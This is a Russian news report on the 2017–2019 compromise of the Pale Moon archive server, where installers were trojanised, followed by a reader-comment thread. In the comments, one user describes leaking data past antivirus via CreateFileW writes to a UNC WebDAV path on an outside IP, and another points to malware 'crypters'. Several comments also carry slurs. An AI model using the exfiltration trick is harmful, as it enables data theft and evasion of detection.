Автор браузера Pale Moon раскрыл (https://forum.palemoon.org/viewtopic.php?f=17&t=22526) сведения о компрометации сервера archive.palemoon.org, на котором хранился архив прошлых выпусков браузера до версии 27.6.2 включительно. В ходе взлома атакующие инфицировали вредоносным ПО все размещённые на сервере исполняемые файлы с инсталляторами Pale Moon для Windows. По предварительным данным подстановка вредоносного ПО была совершена ещё 27 декабря 2017 года, а выявлена только 9 июля 2019 года, т.е. полтора года оставалась незамеченной.В настоящее время проблемный сервер отключен для проведения разбирательства. Сервер с которого распространялись актуальные выпуски
Pale Moon не пострадал, проблема затрагивает только старые Windows-версии, установленные из архива (выпуски перемещаются в архив по мере выхода новых версий). Во время взлома сервер работал по управлением Windows и был запущен в виртуальной машине, арендованной у оператора Frantech/BuyVM. Какая именно уязвимость была эксплуатирована и специфична ли она для Windows или затрагивала какие-то запущенные сторонние серверные приложения не сообщается.
После получения доступа атакующие выборочно инфицировали все exe-файлы, связанные с Pale Moon (инталляторы и самораспаковывающиеся архивы), троянским ПО Win32/ClipBanker.DR (https://www.fortiguard.com/encyclopedia/virus/7658424), нацеленным на кражу криптовалюты и платёжных реквизитов. Троян предоставляет возможность удалённого входа на систему пользователя, перехватывает клавиатурный ввод и может принимать участие в совершении DDoS-атак. Исполняемые файлы внутри архивов zip не поражены.
26 мая 2019 года в процессе активности на сервере злоумышленников (не ясно те же это атакующие, что при первом взломе или другие), нормальная работоспособность archive.palemoon.org была нарушена - хост не смог перезагрузиться, а данные были повреждены. В том числе были потеряны системные логи, которые могли включать более детальные следы, свидетельствующие о характере атаки. В момент данного сбоя администраторы не подозревали о компрометации и восстановили работу архива, используя новое окружение на основе CentOS и заменив загрузку через FTP на HTTP.Так как инцидент не был замечен на новый сервер были перенесены файлы из резервной копии, которые уже были инфицированы. Разбирая возможные причины компрометации предполагается, что атакующие получили доступ подобрав пароль к учётной записи персонала хостинга, получив прямой физический доступ к серверу, выполнив атаку на гипервизор для получения контроля за другими виртуальными машинами, взломав web-панель управления, перехватив сеанс удалённого обращения к рабочему столу (использовался протокол RDP) или эксплуатировав уязвимость в Windows Server. Вредоносные действия были произведены локально на сервере с использованием скрипта для внесения изменений в уже имеющиеся исполняемые файлы, а не путём их повторной загрузки извне.
Автор проекта уверяет, что только он имел доступ администратора в системе, доступ был ограничен одним IP-адресом, а базовая ОС Windows была обновлена и защищена от внешних атак. При этом для удалённого доступа использовались протоколы RDP и FTP, а также на виртуальной машине запускалось потенциально небезопасное ПО, что могло стать причиной взлома.
URL: https://forum.palemoon.org/viewtopic.php?f=17&t=22526
Новость: https://www.opennet.dev/opennews/art.shtml?num=51071
> По предварительным данным подстановка вредоносного ПО была совершена ещё 27 декабря 2017 года, а выявлена только 9 июля 2019 года, т.е. полтора года оставалась незамеченной.Секурность уровня пушистого проекта.
Секурность уровня кто больше заплатит того и секурность.
В этом вся суть оперсорс, все поломано, и всем пофиг )
всеми забытый сервер с ненужными архивами бесполезных версий поломали, видимо, через рас...во французского араба-хостера, тоже мне, проблема.Никто ее нихрена не замечал, поскольку древние сборки под винду вообще никому не нужны, кроме тех, у кого они и так уже давно есть, любителей XPшечки.
Если бы у кого-то был реально работающий эксплойт для ms rdp в 2017м году - он бы не разменивался на какую-то фигню.
Но ты, конечно же, можешь проспонсировать автору нормальный хостинг для архивов. Бонус по сравнению с мурзилой - эти деньги потратят если не на хостинг, то хотя бы на пиво автору, а не на лекцию по взаимоважению альтернативно-одаренных индусов-трансгендеров.
> тоже мне, проблема.А как же. Я вот такой ерундой не пользуюсь.
Но вот Transmission перестал после двух случаев взлома. На macOS вообще (заменил на aria2c).И на Ubuntu раньше подключал PPA (https://launchpad.net/~transmissionbt/+archive/ubuntu/ppa) теперь использую чисто из стандартного проверенного репозитория. Хотя можно хи-хикать и ха-хакать, что типа и не касалось, да и какая разница, но лучше перебдеть, особенно если это нетрудно.
> Но вот Transmission перестал после двух случаев взлома. На macOS вообще (заменила в нем были за последние десять лет хоть какие серьезные уязвимости?
и вот зачем его вообще обновлять? Протокол не изменяется уже больше десятка лет, ничего хорошего модные улучшайки все равно там не сделали (а, ну да, ну да - теперь можно обмазаться наисвежайшим gtk!)
я использую версию из последних не изуродованных улучшайками (то есть не требующую самой распоследней версии cmake) - что я делаю не так?
Дружищще, как качать с помощью этого aria2? Я вот скачиваю рандомный файл с rutor.is, прописываю в терминале aria2c /Users/test/Downloads/1.torrent и ничего не происходит, одни Error.
Чувак, остынь. Это всего лишь браузер.
За милю чувствуется как у тебя пригорело, серьезно
> За милюбггг
https://allthatsinteresting.com/wordpress/wp-content/uploads...
>Бонус по сравнению с мурзилой - эти деньги потратят если не на хостинг, то хотя бы на пиво автору, а не на лекцию по взаимоважению альтернативно-одаренных индусов-трансгендеров.что в этом плохого? это же просто прекрасно
Почему-то я совершенно уверен, что разрабам в Мозилле хватает и на хостинг, и на крафтовое пиво, и даже на односолодовый вискарь с закусью, а пожертвователи в их фонд совершенно не против того, чтобы часть денег уходило на программы по совершенствованию социальной коммуникации ;-)А отдельные посконные товарищи на Опеннете в комментариях просто занимаются традиционным для небогатых стран спортом - публично выражают зависть к тому, что у кого-то таки есть деньги.
естественно - деньги-то у гугля - бесконечные.> А отдельные посконные товарищи на Опеннете в комментариях просто занимаются традиционным для
> небогатых стран спортом - публично выражают зависть к тому, что у кого-то таки есть деньги.нет, я совершенно не завидую богатым п-сам, добившихся всего, давая в %опу.
отдельного товарища как-то раз от перечисления последних копеек очень даже выклянчиваемых другим опенсорсным прожектом, остановила невовремя сработавшая защита от фингерпринтинга.
Через месяц выяснилось, что на эти денежки они таки да - наняли лектора по правам п-сов и умственно-обиженных кодеров.А вот про шерстяного ничего такого не выяснилось. И я ему подкидывал мелочь по возможности, пока палка не заблокировала мой акаунт за отказ предоставлять сведения, которые обо мне не всякий банк получил.
>то хотя бы на пиво автору, а не на лекцию по взаимоважению альтернативно-одаренных индусов-трансгендеров.Ты бы для начала выяснил, кто автор сабжа. Есть мнение, что автор как раз эти самые лекции читает за деньги, в свободное от программного вандализма время.
Родился в Голландии, живёт в Швеции, рисует фуррей? Да однозначно π-дор, нарик и русофоб!
Вот это правильно. Лучше рисовать http://www.wolfbeast.com
> всеми забытый сервер с ненужными архивами бесполезных версий поломалиТак вот почему никто не качает Последние ТруеЪ Версии Firefox™ с XUL: не нужны никому!
> Изменения в установщике могли быть выявлены пользователем при проверке прилагаемых к файлам цифровых подписей
Сами себя взломали?
Нет, просто поступила команда "Мочить!" - слишком мало телеметрии, пацаны из Хрома и Гадзиллы волнуются.
> полтора года оставалась незамеченнойА вот использование системных библиотек в OpenBSD заметили достаточно оперативно.
там другой пациент заметил, еще более больной чем главный шерстяной.Он виндой не интересуется совсем, так что тут шансов не имел.
Сс, больно. Как бы это не подорвало всё доверие к проекту. А почему не было какой-нибудь системы контроля целостности архива, хоть тот же хэш, снимающийся автоматически? Не висело бы так долго.
и чем бы это помогло? Человек, способный поперезаражать архивы почти никому неведомого браузера - уверяю тебя, способен пересчитать и хэши, хранимые на том же самом сервере.специально для любителей скачать .exe бесплатнобезсмс и с того же сайта тут же скачать .md5 - секьюрить, мать его!
Помогло бы банально подписывать установщик - но там у автора какая-то намертво застрявшая проблема, из-за которой он как бы подписан, но как бы не подписан, и все равно вылезает окошко "вы собираетесь запустить какую-то явно вредную хрень - ok, yes, continue?"
Плюс еще и антивирусы умудряются найти там то, чего нет, поэтому и на их предупреждение всем плевать. Так что кто-то очень, очень старательно выбрал мишень.
> Человек.. Так что кто-то очень, очень старательно выбрал мишень.Ахахаха. Да обычный червяк-майнер стучится во все дыры и заражает все экзешники, до которых можешь дотянутся.
обычному червяку-майнеру несколько сложно, на мой взгляд, проломить среду виртуализации, каким бы уг она не была.тут больше похоже на ручную работу.
> проломить среду виртуализацииА этого и не надо. У виртуалки кучу сервисов наружу. А ещё если в клиенте на дрйгой машине ради уюобства сохранён пароль в открытом виде...
Не надо выдумывать сложные варианты, когда обычно самые простые работают.
> А этого и не надо. У виртуалки кучу сервисов наружу.у штатно установленной винды никакой "кучи сервисов наружу" нет и в помине. И rdp появляется после того как его вручную разрешишь.
Ну я понимаю, альтернативно-одаренные макопонийопы первым делом на вопрос о доверенной сети отвечают "home!" но вряд ли шерстяной настолько альтернативно-одарен.И да, мою 2008 все еще не поломали, я там не ненужные мертвые архивы храню, и за ней слежу. Больше переживаю за вмварь, в которой она крутится и в которой хрен его знает, из чего сделан и как работает файрвол и хрен заметишь вовремя, что там завелся засланный казачок - ни алармов, ни нормального wtmp, логи с кучей мусора, не разделяемого по категориям... А теперь прикинь, что творится у той же aruba, и станут ли они беспокоиться ради моего 1евро.
> А ещё если в клиенте на дрйгой машине ради уюобства сохранён пароль в
> открытом виде...если на этой другой машине у тебя рабочие исходники продукта - можешь хранить его там в открытом виде. Потому что он уже никому не понадобится, если ее поломают.
> Не надо выдумывать сложные варианты, когда обычно самые простые работают.
у меня тут, как внезапно выяснилось, ржавый-прержавый линуксроутер торчал ssh-ем в интернет - год минимум. С паролем из шести букв. Простым. Ну вот хоть бы какой вирус полезный прислали, или майнер там... нет, мильен попыток, ноль разумных (в смысле, они ломились рутом и прочими юзерами, ни в одной нормальной системе вообще не пускающими) Эх... вот в том самом 2009м стоило оставить открытый анонимный ftp... Измельчали людишки.
а ты говоришь, винда... это тебе не червяк на баше, безмозгло запускающий системный ssh, тут программировать надо...
Правда, надысь по известному поводу все же порадовался своей паранойе и отсутствию у той винды allow all на rdp. Правда, эксплойта, похоже, не существует.
> у штатно установленной винды никакой "кучи сервисов наружу" нет и в поминеНу да, конечно её голую поставили и ничего не делали 🤣
>> у штатно установленной винды никакой "кучи сервисов наружу" нет и в помине
> Ну да, конечно её голую поставили и ничего не делали 🤣целый ftp сервер в r/o mode поставили, да. Что еще по твоему делают на арендованом шитхосте для хранения устаревших копий, переставших влезать на основные сервера? Запускают needforspeed5 ?
эти Хоть что могут.
Естественно ты не замечаешь про то, что я написал про заражение клиентской машины, где сохранён пароль.
А ещё такие диванные админы реально любят всё пихать на один сервер.
Вариантов масса и огромная куча — ничего удивительного.
> Естественно ты не замечаешь про то, что я написал про заражение клиентской
> машины, где сохранён пароль.клиентская машина шерстяного, внезапно, наверняка и основная для разработки. говорю же - хоть на десктоп ярлычком положи, если ее поломают, проблема будет не в этом ярлычке точно.
Но ооочень навряд ли она торчит голым задом в интернеты и с нее открывают "black girl porno чтототам" (в regru, ага, конечно).
> А ещё такие диванные админы реально любят всё пихать на один сервер.
пока все пихали на один - ничем и не воняло, а вот как в него перестало влезать, и завелись толком необслуживаемые и даже непосещаемые помойки (было бы напихано на один - было бы очень непросто вместо винды внезапно поставить центос) - вот те и нате.
Всегда так и бывает, поэтому я старательно тушу все малоиспользуемые сервисы - обязательно забудешь. А на рабочих машинках любая необычная активность вызывает вопросы - "чаво это оно тут?"
P.S. а восстанавливал, небось, Тобик - откуда бы у шерстяного центось взялась.
> у меня тут, как внезапно выяснилось, ржавый-прержавый линуксроутер торчал ssh-ем в интернет - год минимум. С паролем из шести букв. ПростымНу значит не такой простой. Я видел случай на предприятии, когда одноплатник ARM рутом ssh выставили на белый IP без пароля («ну а кто его знает этот IP, кому мы нужны»). Урону ноль, ибо чисто на поиграться было для тестов, выгреб я от туда около 15 штук зловредов, около 3 было под арм, но кажись ничего не смогли сделать.
Тактика же простая, просто стучишься тупо во все дыры, тебя не удалось пенетрировать, ну и ладно — побежали дальше. Всё равно всё софт долбит автоматом.
> Ну значит не такой простой.да полное уг - я ж его из дома только набираю, ssh вообще не должен был слушать внешний интерфейс - ну, как обычно, что-то когда-то срочно было надо, открыл, айпишник на том конце хз какой, снял фильтр, забыл... уп-с, что-то логи сильно большие для этой помойки, что это в них? Аааа, oracle:dba, postgres:dba, admin:admin... тьфуй.
Хоть бы test:test попробовали, для приличия - один раз повезло мне такого забыть (там не test, но рядом лежало - причем оно рутом стало в долю секунды, не поленилось кернельный zeroday откуда-то притащить. Правда, позорно застряло в selinux'е. Но это тоже 2007й какой-то был, сейчас так разучились, или берегут для уважаемых клиентов.)> Всё равно всё софт долбит автоматом.
тем более - машина, она ж железная, чего ж не поподбирать поприличней чо.
о! Одноплатник. Надо попробовать.
(odroid ведь нормальный пароль?)
> о! Одноплатник. Надо попробовать.
> (odroid ведь нормальный пароль?)Опыт NASA показывает, что для бекдоров хватит и ширпотребного RPi, в т. ч. в качестве пароля, ага.
но у меня нет rpi :-( ведроид вот есть. C permitroot, как же ж иначе. Но вот даже не уверен - такой сложный пароль-то подберут?
>у штатно установленной винды никакой "кучи сервисов наружу" нет и в помине. И rdp появляется после того как его вручную разрешишь.Вотт оно чо! А я то я думаю с чего бы WannaCry разбушевался
Хорошо что ты всё прояснилЯ погляжу ты тут настолько эксперт по всем вопросам, что без точки тебя уже забанили
> Как бы это не подорвало всё доверие к проектКакое доверие? Люди пользуются трухлявым браузером с известными уязвимостями от Firefox.
Некоторые залатывают спустя два месяца, с некоторыми ну и ладно...
О чём вообще разговор? У пользователей этого браузера доверие не надорвётся - через неделю забудут всё равно.
>> Как бы это не подорвало всё доверие к проект
> Какое доверие? Люди пользуются трухлявым браузером с известными уязвимостями от Firefox.покажи хоть один работающий эксплойт такой уязвимости. Работающий, разумеется, в PM.
> Некоторые залатывают спустя два месяца, с некоторыми ну и ладно...
в фуфлофоксе в каждом релизе стопиццот свежеисправленых уязвимостей "детали не разглашаются".
Но ты же им пользуешься?
> покажиОт этого сидение на пороховой бочке рациональнее не станет. Хотя да, шансов что бабахнет - это не такое уж большое число. Небольшое для статистики, а никогда ты сидишь на этой бочке
> в фуфлофоксе в каждом релизе стопиццот свежеисправленых уязвимостей "детали не разглашаются".
Но ты же им пользуешься?
Не пользуюсь.
>> покажи
> От этого сидение на пороховой бочке рациональнее не станет. Хотя да, шансов
> что бабахнет - это не такое уж большое число. Небольшое дляполагаю, их ровно ноль, пока ты лично кому-то не покажешься нужным (и вот это как раз был случай, когда показался - потому что идеальная цель) - эксплойт для мазилы, даже если кто-то напишет, что неинтересно (4%) и геморройно (каждый день новая версия) - все равно придется тюнить под другие смещения и другие паттерны для гаджета, if any. И потом еще надо его как-то умудриться мне подсунуть. Да нахрен я кому ТАК нужен-то? "я вчера взломал твой пароль "пароль", подключился к твоей вебкамере, срочно-срочно пришли мне 0.000001btc а не то!" вот надежный метод "майнинга".
>> в фуфлофоксе в каждом релизе стопиццот свежеисправленых уязвимостей "детали не разглашаются".
> Но ты же им пользуешься?
> Не пользуюсь.а, ну тогда понятен, сафаря ж неуязвима.
примерно как тот же неуловимый джо.
(хотя...что ты там говорил что у ее пользователей как раз есть что взять?)
> эксплойт для мазилы, даже если кто-то напишет, что неинтересно (4%) и геморройно (каждый день новая версия)Ну так уже было с PDF.js - хорошая пробивка под все платформы. Но правда паленную луну это не касалось (ибо слишком старая, там его и не было).
Вторая штука эксплуатируемая в реальности появилась вот недавноhttps://www.opennet.dev/opennews/art.shtml?num=50913
https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/Касается ли это паленную луну или нет - неизвестно. Опять же никто специально стараться не будет, пробивка просто видеть у тебя фурифоксообразное вот на тебе получай - не прошло, ну и ладно, не особо хотелось. Подействовало - отлично, ещё один отпенетрированный.
> Ну так уже было с PDF.js - хорошая пробивка под все платформы.так его ж оттуда и выпилили (потом, правда, обратно впилили, посвежее). Ну и опять же - кто ж порно в pdf будет качать? Мне уже бояцца открыть квитанцию авиабилета, или все же маловероятно что арабы ТАК будут пытаться меня поиметь?
> Вторая штука эксплуатируемая в реальности появилась вот недавно
и поимели кого? Правильно - пользователей самого передового браузера ;-)
https://github.com/MoonchildProductions/UXP/commit/32d13a164...
в 28.6, как видишь, исправлено, сразу же после того как эта информация выплыла наружу. Ну опять же ты знаешь, кого благодарить за современную политику прятать уязвимости до релиза или вообще их не публиковать, маскируя изменения под малозначительные.> Опять же никто специально стараться не будет
здрасьте. там именно специально старались - в том числе не зацепить массовых хомячков, чтобы не палиться раньше времени.
и тут, что характерно, кто-то такой же, сцуко, старательный.
> https://github.com/MoonchildProductions/UXP/commit/32d13a164...в 28.6, как видишь, исправлено, сразу же после того как эта информация выплыла наруж
А это разве то? Ты откуда это вообще взял?
> А это разве то?то. с поправкой на существенно разный код в этом месте (у шерстяного, кстати, сразу нах с пляжа, а у мазилы какие-то непонятные приседания по всему объемному и бестолковому куску оптимизатора).
где взял, где взял - в гите нашел. Посмотрев, что именно мазила там исправляла.
Так коммит на раз-два находится в mozilla-unified. Другое дело, что авторы StaleMoon решили стырить его под видом безобидного улучшизма, не оставляя никаких отсылок к CVE, даже косвенных. Нуачо, можно будет потом тыкать в коммит-хистори и верещать, что тыщу лет без дыр жили, в отличие от!
> Так коммит на раз-два находится в mozilla-unified. Другое дело, что авторы StaleMoon
> решили стырить его под видом безобидного улучшизмаони просто скопировали ровно тот комментарий, который был в апстриме.
>, не оставляя никаких отсылок к CVE, даже косвенных
как будто мазила не сделала ровно то же самое, даже не открыв cve, пока не появился эксплойт in the wild?
> они просто скопировали ровно тот комментарий, который был в апстримепотеряв при этом ссылку на багзиллу.
>> не оставляя никаких отсылок к CVE, даже косвенных
> как будто мазила не сделала ровно то же самоеНе ровно то же самое: см. выше.
> даже не открыв
> cve, пока не появился эксплойт in the wild?Так и патч появился как реакция на эксплоит.
По твоей логике нужно ещё зарезервировать парочку CVE для `yes` из coreutils: а вдруг? Зачем дожидаться багфиксов или ботов с 0day-скриптами, когда можно напугать корпоративные secscan заранее?
> Так и патч появился как реакция на эксплоит.с добрым утречком. Эксплойт написан кем-то неленивым, анализировавшим такие вот странные комиты. Постфактум.
Просто анализировал-то он их в nightly, и все обычные юзеры-простофили оказались открыты для этой уязвимости, пока троянец не был, наконец, замечен, и мазила не смержила изменение в релиз.
> там именно специально старались - в том числе не зацепить массовых хомячков, чтобы не палиться раньше времени.:D Как не крути всегда будет хитрый план. Диагноз понятен.
> Как не крути всегда будет хитрый план.что тебя удивляет - что эти ребята давно уже не робингуды, и работают за бабки, поэтому лишний раз источниками не разбрасываются? Так и Робин-то, если уж честно, не за коммунизм и возвращение Артура боролся, ему покушать чего.
шансов нарваться на васяна тут около нуля - васяны вон к ssh пароль подобрать не могут, потому что нифига не стараются. А тут целый биткойн...
Ничего не удивляет.
Просто безалаберное отношение хозяина сервера — вот и всё.
сколько у тебя вот лично серверов? Я про свои - хрен знает. Причем ладно к винде - ее немного, и, в конце-концов, меня тоже не полностью обходят стороной общие помешательства - я к ней с особой осторожностью отношусь, а ржавых линуксных виртуалок - до чорта. Половина еще и апгрейду не подлежит в принципе, только латать по месту.Ну да, не у лягушкохостера под kvm, но тоже не айс.
Поэтому хоть и стараешься сократить число таких вот забытых и непосещаемых годами помоек до нуля, все равно что-нибудь запросто может вылезти.это именно про личные, не про корпоративные - там вообще трэш, п-ц и пароли 123. И поменять ничего нельзя, потому что никто не знает, как оно работает (и почему вообще).
>А почему не было какой-нибудь системы контроля
>целостности архива, хоть тот же хэш, снимающийся
>автоматически? Не висело бы так долго.Неприятно, конечно что автор интересная личность, и пользовался виндовым сервером и таким ущербным провом, однако:
>"Изменения в установщике могли быть выявлены пользователем
>при проверке прилагаемых к файлам цифровых подписей или хэшей SHA256."Не знаю как кто, а я всегда пользуюсь этими возможностями проверить архив, во всех адекватных проектах такие возможности есть, это же вам не deadbeef какой-нибудь!
Доверие к проекту, основатель которого - больной на голову, и это было заранее известно? Вы верно шутите.
Для недоверия достаточно и того, что автор - вендузятник.
Это диагноз такой?
Ну я с лёгкостью могу назвать нескольких, до которых я бы хотел дорасти.
А вот многие местные многие комментаторы - это что-то ниже плинтуса. И неважно какую ОС они используют (далеко ходить не надо ☝).
Вместо логики просто мышление штамповкой фанатизма.
Фанатизм считать венду вредоносным ПО, как ниже охарактеризовали? А иначе логика есть.
Вообще-то, аноним, ты свою справку ещё никому тут не предъявил
>В ходе взлома атакующие инфицировали вредоносным ПО все размещённые на сервере исполняемые файлы с инсталляторами Pale Moon для Windows.Ну так внедрение вредоносного ПО в программу установки для ОС, которая сама по себе является вредоносным ПО. Чего такого?
Это всё козни мозиловцев или гугля, а может они вместе сговорились ещё, чтобы подгадить браузеру, который уверенно вытесняет их поделия на рынке, бояцца сyкины дети!>а базовая ОС Windows была обновлена и защищена от внешних атак
Да вы что? Никогда винду не ломали и вот опять, сервак на винде, автор форменный ССЗБ
>восстановили работу архива, используя новое окружение
> на основе CentOSО стал умнеть
>Так как инцидент не был замечен на новый сервер
>были перенесены файлы из резервной копии,
>которые уже были инфицированы....но, видимо не до конца, ай какая жалость, виндовое раздолбайство всёж не удалось до конца победить, видать инертность очень сильна!
> Какая именно уязвимость была эксплуатирована и специфична ли она для Windows или затрагивала какие-то запущенные сторонние серверные приложения пока не ясно.Судя по тому, что взлом полтора года никто не замечал, то уязвимость вполне очевидна - прослойка между клавиатурой и креслом, использовавшаяся в качестве админа данного сервера. Видимо, обновления никто не ставил и установкой антивируса тоже не заморачивался. Ясно же, что в случае чего будет виновата винда.
> Ясно же, что в случае чего будет виновата виндаСистема не способная сама себя защищать априори виновата!
>> Ясно же, что в случае чего будет виновата винда
> Система не способная сама себя защищать априори виновата!Да естественно, особенно если на нее не ставить ни апдейтов, ни механизмов защиты. Это ж только в линуксе всё магическим образом само ставится и настраивается, не то что в этой вашей винде.
> Да естественно, особенно если на нее не ставить ни апдейтов, ни механизмов защиты.со времен xp sp1 утекло немножко океанов воды - теперь надо самому постараться отключить автоапдейты и механизмы защщыты.
А вот де6иллианоиды из коропке так и ставятся без включенного пакетного фильтра, ага. Ну правда, да, норовят тут же выставить тебя на бабки, скачав мильен ненужных обновлений. Правда, устанавливать их - не норовят, такая вот архиоригинальная настройка apt periodic по умолчанию.
> со времен xp sp1 утекло немножко океанов воды - теперь надо самому постараться отключить автоапдейты и механизмы защщыты"петя", "хочешь плакать"... - обновления против них были выложены за 4 месяца до ба-баха эпидемии. Заражена была явно не только Windows XP SP1.
>> со времен xp sp1 утекло немножко океанов воды - теперь надо самому постараться отключить автоапдейты и механизмы защщыты
> "петя", "хочешь плакать"... - обновления против них были выложены за 4 месяца
> до ба-баха эпидемии. Заражена была явно не только Windows XP SP1.ну так находятся, старательные. Я даже на каком-то гуанофоруме видел советы как каждому дятлу все это у себя отключить (кажется, сопровождаемые мантрой "венда за тобой следит, апдейты все с телеметрией!")
но вряд ли тут тот случай.
>обновления против них были выложены за 4 месяца до ба-баха эпидемии.Что за эпидемия?
>Заражена была явно не только Windows XP SP1Чем заражена?
Можно подробнее-конкретнее, где про это можно почитать/посмотреть, а то нифуя не понятно, но очень интересно?!
https://en.wikipedia.org/wiki/Petya_(malware)
https://en.wikipedia.org/wiki/WannaCry_ransomware_attackно для того чтобы эта хрень работала - надо чтобы кто-то очень умный выставил smb голой задницей в инет - что многим альтернативно-одаренным, как ни странно, вполне удалось, не смотря на некоторую нетривиальность сего действа - afair, нужно включить home profile на внешнем сетевом интерфейсе, domain не сильно поможет, поскольку там доступ ограничен локальной сетью, где второго такого лоха может в нужный момент и не оказаться.
Сравните, опять же, с https://www.samba.org/samba/security/CVE-2017-7494.html - и не забудьте снова вспомнить добрым словом de6иллиан и его альтернативу от Кос...запрещенного опеннетом, у которых сосамба без файрвола ставится в одно движение мыши.
>> Да естественно, особенно если на нее не ставить ни апдейтов, ни механизмов защиты.
> со времен xp sp1 утекло немножко океанов воды - теперь надо самому постараться отключить автоапдейты и механизмы защщыты.Но антивирус был стопудово либо отключен, либо не обновлен. Потому что он бы пришиб эти файлы сам.
Ну и апдейты сами ставятся только если это десткопная винда. На серваках подразумевается, что одмин таки хоть немного над настройками подумал и запланировал окна обслуживания для установки обновлений и перезагрузки.
Да и антивирь установлен и активирован по умолчанию лишь на совсем новых виндовых серваках, но я сомневаюсь, что там был именно такой...
> Но антивирус был стопудово либо отключен, либо не обновлен. Потому что он бы пришиб эти файлы сам.он вроде без пинка внутрь архивов не лазит, этим только улучшенная корп-версия занимается, а снаружи-то там все было гладко.
> Ну и апдейты сами ставятся только если это десткопная винда.
не, на сервере такая ж точно фигня, ровно в том же месте настраивается.
И, помнится, уже довольно давно она стала изрядно назойлива. А вот всяких дефендеров да, даже в 2012 нет.но я тут полазил по сайту этих лягушкоедов -
KVM 128MB Windows 2003 only. ~30MB RAM spare
KVM 256MB Windows 2003 only. ~150MB RAM spare
KVM 512MB Windows 2003, 2008, 2012. 2008 will likely be hitting the pagefile a lot
KVM 1024MB Windows 2003, 2008, & 2012. Recommended amount for Windows 2008
KVM 2048MB Windows 2003, 2008, & 2012
а учитывая нехватку у шерстяных лишней монеты - угадай, что у них там стояло :-(
> он вроде без пинка внутрь архивов не лазит, этим только улучшенная корп-версия занимается, а снаружи-то там все было гладко.От антивиря зависит, конечно, но вроде как файл проверяется при первом обращении к нему. Да и файловый кэш периодически чекает. После прописывания в файлы вошки - антивирь полюбому должен был возбудиться. Если он там, конечно, был и был обновлен.
> не, на сервере такая ж точно фигня, ровно в том же месте настраивается.
Настраивается еще со времен XP в одном месте - gpedit.msc, или через групповые политики (если комп в домене, что в данном случае вряд ли), просто на серваке оно, вроде, по дефолту не ребутит сервак само, потому что никому не нужны внезапные даунтаймы из-за того, что админ Вася забыл настроить сервисные окна...
Хотя, ХЗ, давно туда уже не глядел, могу ошибаться.> а учитывая нехватку у шерстяных лишней монеты - угадай, что у них там стояло :-(
Да это, в принципе, и так было понятно.
> Но антивирус был стопудово либо отключен, либо не обновлен. Потому что он бы пришиб эти файлы сам.В новости:
> подстановка вредоносного ПО была совершена ещё 27 декабря 2017 годаИдем по ссылке https://www.fortiguard.com/encyclopedia/virus/7658424
читаем:
> Released Mar 05, 2018Ну и вылезать из криокамеры хотя бы раз в 10 лет нужно:
http://www.google.com/search?q=crypter+with+fud+guarantee&oq...
> Download XXX now and make files undetectable from:
> AVG Free, ArcaVir, Avast, AntiVir (Avira), BitDefender, VirusBuster Internet Security, Clam , COMODO Internet Security,
> Dr.Web, eTrust-Vet, F-PROT , F-Secure Internet Security, G Data, IKARUS Security, Kaspersky , McAfee, MS Security
> Essentials, ESET NOD32, Norman, Norton , Panda Security, A-Squared, Quick Heal , Solo , Sophos, Trend Micro Internet
> Security, VBA32 , Zoner , Ad-Aware, AhnLab V3 Internet Security BullGuard, Immunet , K7 Ultimate, NANO , Panda CommandLine, VIPRE,Массовые продажи "крипторов" для "илиты" (т.е. доступные для киддисов), я еще где-то в 2006 видел (как пошел интернет в массы и появилась возможность анонимной оплаты всякими PaySafe картами, так оно в общем-то и поперло).
Если использованное поделие более-менее качественное и сильно не засвечивается, то и сигнатура в базе антивирей может очень долго не появляться.
Сначала читаем это...> Ну и вылезать из криокамеры хотя бы раз в 10 лет нужно:
А затем вот это...
> Если использованное поделие более-менее качественное и сильно не засвечивается, то и сигнатура
> в базе антивирей может очень долго не появляться.Эх, ирония, злая ты с@ка... Как раз для недавно покинувших криокамеру хотелось бы заметить, что антивирусы уже давно не только по сигнатурам вошек определяют.
> Эх, ирония, злая ты с@ка... Как раз для недавно покинувших криокамеру хотелось
> бы заметить, что антивирусы уже давно не только по сигнатурам вошек определяют.Ага, ага. Особенно хороша эвристика в заверениях маркетологов, прям чудесна!
А песочница + поведенческий анализ, background guard и еще куча баззвордов -- оно во первых далеко не бесплатно по ресурсам и скорее всего требует активации ручками, во-вторых - далеко не во всех антивирях реализована, ну и в-третьих:
эффективность опять же сильно преувеличена маркетолухами (оно обычно или не "видит" малварь чуть выше уровня "скопипастил из интернета" или наоборот, срабатывает на каждый калькулятор -- многолетняя практика "защиты интеллектуальной собственности" проприетарщиками с помощью PE-протекторов всех мастей, вплоть до дров, с расшифровкой, виртуализацией и прочим выполняемого кода в памяти, переписыванием там же разделов и таблицы импорта, антидебагприемами -- не очень способствует).Я довольно долго, где-то с 2004 и по 2013 довольно активно интересовался этим делом и тыкал регулярно пару-тройку "лидеров рынка" (Симантек, Касперский) палочкой на предмет распознания малвари и обхода "файрволов".
В последний раз это было где-то в 2014-15 и сказки про супермега-активную-защиту и мгновенное распознание малвари по поведению так и оставались сказками - товарищи так и не могли отловить стандартный обфускатор ("crypter") малвари по весьма характеристичным вызовам АПИ, как и перезаписи выполняемого экзешника в памяти, хотя набор этих АПИ был известен еще с 2004 и не менялся.
Так же стандартная тройка "Суперзащитников" (Касперский, Comodo и еще кто-то там, уже не помню) все еще бодро игнорировала набор тестов Матусека для файерволов. Причем все они, вот уж ирония, были доступны много лет с сорцами:
https://web.archive.org/web/20170822160014/http://www.matous...
Унутрях там вообще трэш и угар (код еще чуть ли не из прошлого века), масса собственных багов и уязвимостей:
http://joxeankoret.com/download/breaking_av_software_44con.pdfНу и личная фишка -- слив информации наружу через вебдав, простой как два палца -- нужно просто иметь на другом конце WebDav сервер и соединяться с ним через файловый АПИ: CreateFileW("\\?\UNC\123.45.67.89\webdav\,), WriteFile("чтоугодно").
Проверял с 2004 и по 2014-15. Нет, никто не ловил.
Видимо потому что сам запрос "проходит" через виндо-ядро и выполняется уже виндокомпонентой. "Лечилось" только полным запретом WebDav, но такое точно нигде не было выставлено "из коробки"И вот как-то мне совсем не верится, что вдруг, за 4-5 лет (учитывая дату взлома -- то вообще 2-3 года) ситуация как-то кардинально поменялась и произошла техническая революция.
Вот то, что еще базвордиков придумали и еще лучше рекламу делают -- да, это может быть, но ими одними зловрдов не поймаешь.
> если на нее не ставить ни апдейтов, ни механизмов защитыРождённый больным неизлечим! (КО)
>> если на нее не ставить ни апдейтов, ни механизмов защиты
> Рождённый больным неизлечим! (КО)То есть, следуя твоей логике - систем, рожденных здоровыми, вообще не существует?
Блин, ты бы хоть, если троллишь, делал это потоньше, а то твой троллинг аж в двери не пролазит...
